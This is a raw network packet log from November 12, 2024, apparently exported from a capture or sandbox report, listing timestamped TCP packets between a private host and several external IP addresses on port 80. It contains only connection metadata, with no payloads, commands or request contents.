                                                                                                                                                            Nov 12, 2024 18:35:05.247936964 CET4985080192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:05.793368101 CET4985080192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:06.813200951 CET4986080192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:06.818300009 CET8049860217.160.0.231192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:06.818895102 CET4986080192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:06.831748009 CET4986080192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:06.836594105 CET8049860217.160.0.231192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:07.671664000 CET8049860217.160.0.231192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:07.821341991 CET8049860217.160.0.231192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:07.821671963 CET4986080192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:08.340173006 CET4986080192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:09.362576962 CET4987280192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:09.604799986 CET8049872217.160.0.231192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:09.604926109 CET4987280192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:09.619227886 CET4987280192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:09.625163078 CET8049872217.160.0.231192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:09.625535965 CET8049872217.160.0.231192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:10.482788086 CET8049872217.160.0.231192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:10.528161049 CET4987280192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:10.603713036 CET8049872217.160.0.231192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:10.603792906 CET4987280192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:11.121457100 CET4987280192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:12.141588926 CET4988580192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:12.147324085 CET8049885217.160.0.231192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:12.147466898 CET4988580192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:12.157274961 CET4988580192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:12.162892103 CET8049885217.160.0.231192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:13.682293892 CET8049885217.160.0.231192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:13.682308912 CET8049885217.160.0.231192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:13.682321072 CET8049885217.160.0.231192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:13.682342052 CET8049885217.160.0.231192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:13.682354927 CET8049885217.160.0.231192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:13.682503939 CET4988580192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:13.682503939 CET4988580192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:13.682576895 CET4988580192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:13.683923006 CET8049885217.160.0.231192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:13.685405016 CET4988580192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:13.685975075 CET4988580192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:13.687825918 CET8049885217.160.0.231192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:13.687927008 CET4988580192.168.2.8217.160.0.231
                                                                                                                                                            Nov 12, 2024 18:35:13.690876007 CET8049885217.160.0.231192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:19.206497908 CET4992180192.168.2.854.179.173.60
                                                                                                                                                            Nov 12, 2024 18:35:19.211445093 CET804992154.179.173.60192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:19.211518049 CET4992180192.168.2.854.179.173.60
                                                                                                                                                            Nov 12, 2024 18:35:19.232404947 CET4992180192.168.2.854.179.173.60
                                                                                                                                                            Nov 12, 2024 18:35:19.237622976 CET804992154.179.173.60192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:20.212279081 CET804992154.179.173.60192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:20.340271950 CET4992180192.168.2.854.179.173.60
                                                                                                                                                            Nov 12, 2024 18:35:20.414923906 CET804992154.179.173.60192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:20.417272091 CET4992180192.168.2.854.179.173.60
                                                                                                                                                            Nov 12, 2024 18:35:20.746675014 CET4992180192.168.2.854.179.173.60
                                                                                                                                                            Nov 12, 2024 18:35:21.767177105 CET4993580192.168.2.854.179.173.60
                                                                                                                                                            Nov 12, 2024 18:35:21.772799969 CET804993554.179.173.60192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:21.775228024 CET4993580192.168.2.854.179.173.60
                                                                                                                                                            Nov 12, 2024 18:35:21.789608002 CET4993580192.168.2.854.179.173.60
                                                                                                                                                            Nov 12, 2024 18:35:21.794661999 CET804993554.179.173.60192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:22.784611940 CET804993554.179.173.60192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:22.840112925 CET4993580192.168.2.854.179.173.60
                                                                                                                                                            Nov 12, 2024 18:35:22.991096973 CET804993554.179.173.60192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:22.991149902 CET4993580192.168.2.854.179.173.60
                                                                                                                                                            Nov 12, 2024 18:35:23.293440104 CET4993580192.168.2.854.179.173.60
                                                                                                                                                            Nov 12, 2024 18:35:24.312488079 CET4994880192.168.2.854.179.173.60
                                                                                                                                                            Nov 12, 2024 18:35:24.319135904 CET804994854.179.173.60192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:24.319322109 CET4994880192.168.2.854.179.173.60
                                                                                                                                                            Nov 12, 2024 18:35:24.335207939 CET4994880192.168.2.854.179.173.60
                                                                                                                                                            Nov 12, 2024 18:35:24.362366915 CET804994854.179.173.60192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:24.362384081 CET804994854.179.173.60192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:25.321352959 CET804994854.179.173.60192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:25.465126038 CET4994880192.168.2.854.179.173.60
                                                                                                                                                            Nov 12, 2024 18:35:25.523438931 CET804994854.179.173.60192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:25.523521900 CET4994880192.168.2.854.179.173.60
                                                                                                                                                            Nov 12, 2024 18:35:25.841634035 CET4994880192.168.2.854.179.173.60
                                                                                                                                                            Nov 12, 2024 18:35:26.861243010 CET4996180192.168.2.854.179.173.60
                                                                                                                                                            Nov 12, 2024 18:35:26.866466999 CET804996154.179.173.60192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:26.866543055 CET4996180192.168.2.854.179.173.60
                                                                                                                                                            Nov 12, 2024 18:35:26.877439976 CET4996180192.168.2.854.179.173.60
                                                                                                                                                            Nov 12, 2024 18:35:26.884114981 CET804996154.179.173.60192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:27.912062883 CET804996154.179.173.60192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:28.090173960 CET4996180192.168.2.854.179.173.60
                                                                                                                                                            Nov 12, 2024 18:35:28.122138977 CET804996154.179.173.60192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:28.123420000 CET4996180192.168.2.854.179.173.60
                                                                                                                                                            Nov 12, 2024 18:35:28.124841928 CET4996180192.168.2.854.179.173.60
                                                                                                                                                            Nov 12, 2024 18:35:28.129925966 CET804996154.179.173.60192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:33.179466963 CET4998980192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:35:33.184437990 CET80499893.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:33.184518099 CET4998980192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:35:33.197989941 CET4998980192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:35:33.203020096 CET80499893.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:33.829365015 CET80499893.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:33.829472065 CET4998980192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:35:34.699650049 CET4998980192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:35:34.704853058 CET80499893.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:35.718763113 CET4999980192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:35:35.723999023 CET80499993.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:35.725554943 CET4999980192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:35:35.737545013 CET4999980192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:35:35.742621899 CET80499993.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:36.354737997 CET80499993.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:36.354897976 CET4999980192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:35:37.246625900 CET4999980192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:35:37.251986027 CET80499993.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:38.267260075 CET5000680192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:35:38.272353888 CET80500063.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:38.275357008 CET5000680192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:35:38.287031889 CET5000680192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:35:38.292129993 CET80500063.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:38.292165041 CET80500063.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:38.903568983 CET80500063.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:38.903628111 CET5000680192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:35:39.793394089 CET5000680192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:35:39.798393965 CET80500063.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:40.813796997 CET5000780192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:35:40.818811893 CET80500073.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:40.818885088 CET5000780192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:35:40.828793049 CET5000780192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:35:40.834105968 CET80500073.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:41.456736088 CET80500073.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:41.457276106 CET80500073.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:41.457325935 CET5000780192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:35:41.460577011 CET5000780192.168.2.83.33.130.190
                                                                                                                                                            Nov 12, 2024 18:35:41.466119051 CET80500073.33.130.190192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:54.631351948 CET5000880192.168.2.8156.226.22.233
                                                                                                                                                            Nov 12, 2024 18:35:54.636733055 CET8050008156.226.22.233192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:54.636828899 CET5000880192.168.2.8156.226.22.233
                                                                                                                                                            Nov 12, 2024 18:35:54.796467066 CET5000880192.168.2.8156.226.22.233
                                                                                                                                                            Nov 12, 2024 18:35:54.801577091 CET8050008156.226.22.233192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:55.638773918 CET8050008156.226.22.233192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:55.780953884 CET8050008156.226.22.233192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:55.781091928 CET5000880192.168.2.8156.226.22.233
                                                                                                                                                            Nov 12, 2024 18:35:56.309468985 CET5000880192.168.2.8156.226.22.233
                                                                                                                                                            Nov 12, 2024 18:35:57.333928108 CET5000980192.168.2.8156.226.22.233
                                                                                                                                                            Nov 12, 2024 18:35:57.338977098 CET8050009156.226.22.233192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:57.339086056 CET5000980192.168.2.8156.226.22.233
                                                                                                                                                            Nov 12, 2024 18:35:57.433465004 CET5000980192.168.2.8156.226.22.233
                                                                                                                                                            Nov 12, 2024 18:35:57.439882040 CET8050009156.226.22.233192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:58.310489893 CET8050009156.226.22.233192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:58.435367107 CET5000980192.168.2.8156.226.22.233
                                                                                                                                                            Nov 12, 2024 18:35:58.493289948 CET8050009156.226.22.233192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:58.493479967 CET5000980192.168.2.8156.226.22.233
                                                                                                                                                            Nov 12, 2024 18:35:58.949949980 CET5000980192.168.2.8156.226.22.233
                                                                                                                                                            Nov 12, 2024 18:35:59.969384909 CET5001080192.168.2.8156.226.22.233
                                                                                                                                                            Nov 12, 2024 18:35:59.974591017 CET8050010156.226.22.233192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:59.974842072 CET5001080192.168.2.8156.226.22.233
                                                                                                                                                            Nov 12, 2024 18:35:59.987641096 CET5001080192.168.2.8156.226.22.233
                                                                                                                                                            Nov 12, 2024 18:35:59.992887974 CET8050010156.226.22.233192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:35:59.993148088 CET8050010156.226.22.233192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:00.935507059 CET8050010156.226.22.233192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:01.027843952 CET5001080192.168.2.8156.226.22.233
                                                                                                                                                            Nov 12, 2024 18:36:01.120275974 CET8050010156.226.22.233192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:01.120387077 CET5001080192.168.2.8156.226.22.233
                                                                                                                                                            Nov 12, 2024 18:36:01.497245073 CET5001080192.168.2.8156.226.22.233
                                                                                                                                                            Nov 12, 2024 18:36:02.516710043 CET5001180192.168.2.8156.226.22.233
                                                                                                                                                            Nov 12, 2024 18:36:02.522479057 CET8050011156.226.22.233192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:02.522636890 CET5001180192.168.2.8156.226.22.233
                                                                                                                                                            Nov 12, 2024 18:36:02.533385992 CET5001180192.168.2.8156.226.22.233
                                                                                                                                                            Nov 12, 2024 18:36:02.538424015 CET8050011156.226.22.233192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:03.491436958 CET8050011156.226.22.233192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:03.668474913 CET5001180192.168.2.8156.226.22.233
                                                                                                                                                            Nov 12, 2024 18:36:03.673257113 CET8050011156.226.22.233192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:03.673381090 CET5001180192.168.2.8156.226.22.233
                                                                                                                                                            Nov 12, 2024 18:36:03.674304962 CET5001180192.168.2.8156.226.22.233
                                                                                                                                                            Nov 12, 2024 18:36:03.679600954 CET8050011156.226.22.233192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:09.043414116 CET5001280192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:09.048404932 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:09.051528931 CET5001280192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:09.066406012 CET5001280192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:09.071789980 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:09.724383116 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:09.724478006 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:09.724493980 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:09.724597931 CET5001280192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:09.724808931 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:09.724848986 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:09.724855900 CET5001280192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:09.724865913 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:09.724910021 CET5001280192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:09.725532055 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:09.725545883 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:09.725558043 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:09.725577116 CET5001280192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:09.726371050 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:09.726469040 CET5001280192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:09.729696035 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:09.729768991 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:09.729782104 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:09.729809046 CET5001280192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:09.730376005 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:09.730422020 CET5001280192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:09.843604088 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:09.843641043 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:09.843652964 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:09.843683958 CET5001280192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:09.843955040 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:09.843969107 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:09.844003916 CET5001280192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:09.844410896 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:09.844424009 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:09.844435930 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:09.844458103 CET5001280192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:09.844491959 CET5001280192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:09.845252991 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:09.845266104 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:09.845277071 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:09.845310926 CET5001280192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:09.891139030 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:09.891191959 CET5001280192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:09.891220093 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:09.891232967 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:09.891277075 CET5001280192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:09.962524891 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:09.962582111 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:09.962591887 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:09.962625980 CET5001280192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:09.962903976 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:09.962949038 CET5001280192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:09.962951899 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:09.962965965 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:09.962976933 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:09.963026047 CET5001280192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:09.963574886 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:09.963615894 CET5001280192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:09.963856936 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:09.963870049 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:09.963923931 CET5001280192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:09.964242935 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:09.964256048 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:09.964267969 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:09.964291096 CET5001280192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:10.011738062 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:10.011758089 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:10.011770964 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:10.011790991 CET5001280192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:10.011837006 CET5001280192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:10.012159109 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:10.081927061 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:10.081955910 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:10.081969976 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:10.081979990 CET5001280192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:10.082031012 CET5001280192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:10.082484961 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:10.082799911 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:10.082844019 CET5001280192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:10.082899094 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:10.082911015 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:10.082926035 CET805001252.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:10.082971096 CET5001280192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:10.574903965 CET5001280192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:11.601532936 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:11.606647015 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:11.607527971 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:11.619322062 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:11.624217987 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.298301935 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.298440933 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.298490047 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:12.298656940 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.298669100 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.298712969 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:12.299247980 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.299259901 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.299273968 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.299293041 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:12.300129890 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.300141096 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.300152063 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.300168037 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:12.300189018 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:12.303597927 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.303993940 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.304029942 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:12.417288065 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.417418957 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.417433023 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.417468071 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:12.417969942 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.417980909 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.417993069 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.418010950 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:12.418030024 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:12.418879032 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.418890953 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.418909073 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.418920994 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.418956041 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:12.418973923 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:12.419962883 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.419974089 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.419991016 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.420017958 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:12.465389967 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:12.536076069 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.536119938 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.536133051 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.536202908 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:12.536578894 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.536590099 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.536612988 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:12.537147045 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.537158012 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.537170887 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.537189960 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:12.537204027 CET5001380192.168.2.852.20.84.62
                                                                                                                                                            Nov 12, 2024 18:36:12.537944078 CET805001352.20.84.62192.168.2.8
                                                                                                                                                            Nov 12, 2024 18:36:12.537956953 CET805001352.20.84.62192.168.2.8
